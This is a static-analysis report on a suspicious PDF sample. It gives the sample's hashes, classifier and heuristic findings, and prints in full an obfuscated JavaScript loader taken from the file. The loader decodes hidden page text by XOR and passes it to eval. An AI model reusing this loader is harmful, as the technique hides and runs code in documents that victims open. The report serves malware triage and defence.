PDF static analysis report

Static analysis result for SHA-256 fded1fa511846ef9…

SUSPICIOUS

PDF

6.8 KB Created: 2010-05-14 23:55:05 Authoring application: louopifikiuekila (via Wauozafokjitexe) First seen: 2013-07-30
MD5: c27163aef7d7c55312f8e1c9718dcd12 SHA-1: 368763d350f5953e6839d51857817b01b2e95e83 SHA-256: fded1fa511846ef942f0bab2b7b4a1f4adaf946317e98e2834fd8cd11a001401
46 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, which is a common technique for delivering malicious payloads. The JavaScript stream itself is obfuscated, preventing a detailed analysis of its specific actions, but its presence strongly suggests an intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 2

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0018_000.js pdf-javascript-stream PDF /JS object 18 at offset 0x14F6 1347 bytes
SHA-256: fdc4d03acae8925d862d79eb7345e9422e77c6c973ef5d0353e0690711703fe4
Preview script
First 1,000 lines of the extracted script
function kH(uN,zS,gF){return uN.substr(zS,gF);}var x=String("eval");var n=new String(kH("le2C5",0,2)+kH("sukngsku",3,2)+kH("snq2thsn2q",4,2));var j=21;var v="";var r="%0joF".substr(0,1);var h=907-891;var f=new String("fr"+"om"+"Ch"+kH("arhCpS",0,2)+"Co"+"de");var d=58-57;var dA=String;var uNI=String("cha"+kH("rCokqf",0,3)+"deA"+kH("t6r7x",0,1));;var oN=new String("sub"+"str");var nS=3;var mN=this;var t="getP"+"ageN"+"umWo"+"rds";var vW=68-66;var yT=kH("getPXIm",0,4)+"ageN"+kH("thWoMfkz",0,4)+"rd";var tA="cha"+"rCo"+kH("deA1tR2",0,3)+kH("trHhe",0,1);var eT=100-100;function rQ(yTG,cF,z,uP,uH,cD){return yTG-cF};function zI(yTG,cF,z,uP,uH,cD){return yTG+cF};function qV(hG,z,uP,uH,cD){return hG[n]-vW};function sH(vE,z,uP,uH,cD){var vE=parseInt(vE,h);vE=kP(vE);vE=hC(dA,f)(vE);return vE}function yR(vE,z,uP,uH,cD){var dW=qV(vE);vE=iL(vE,dW);return sH(vE)};function iL(hG,vI,z,uP,uH,cD){return hG[oN](vI,vW)};function uZ(fU,vI,z,uP,uH,cD){return fU[uNI](vI)};function yF(vE,z,uP,uH,cD){return r+vE};function hC(hG,nI,z,uP,uH,cD){return hG[nI]};function kZ(p,z,uP,uH,cD){return mN[yT](nS,p)};function kP(zQ,oD,z,uP,uH,cD){return zQ^j;};var zSX=mN[t](nS);function pW(vE,z,uP,uH,cD){v=v+vE};var iH=mN[x];var tA=mN[tA];var xK=new dA();function oNG(p,z,uP,uH,cD){var cX=kZ(p);cX=yR(cX);return cX;}for(var p=eT;p<zSX;p++){var vO=oNG(p);pW(vO);}iH(v);